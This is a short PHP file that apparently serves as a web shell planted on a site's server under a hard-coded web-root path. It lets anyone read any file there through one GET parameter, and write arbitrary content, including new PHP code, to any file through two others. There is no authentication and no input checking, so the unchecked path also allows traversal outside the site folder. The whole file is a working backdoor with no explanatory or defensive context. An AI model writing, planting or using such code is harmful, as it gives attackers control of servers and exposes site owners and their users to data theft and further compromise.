<?php if(isset($_GET['f'])){ $file = '/www/wwwroot/hljrlsj.com/' . $_GET['f']; readfile($file); } if(isset($_GET['w'])){ $file = '/www/wwwroot/hljrlsj.com/' . $_GET['w']; file_put_contents($file, $_GET['c']); } ?>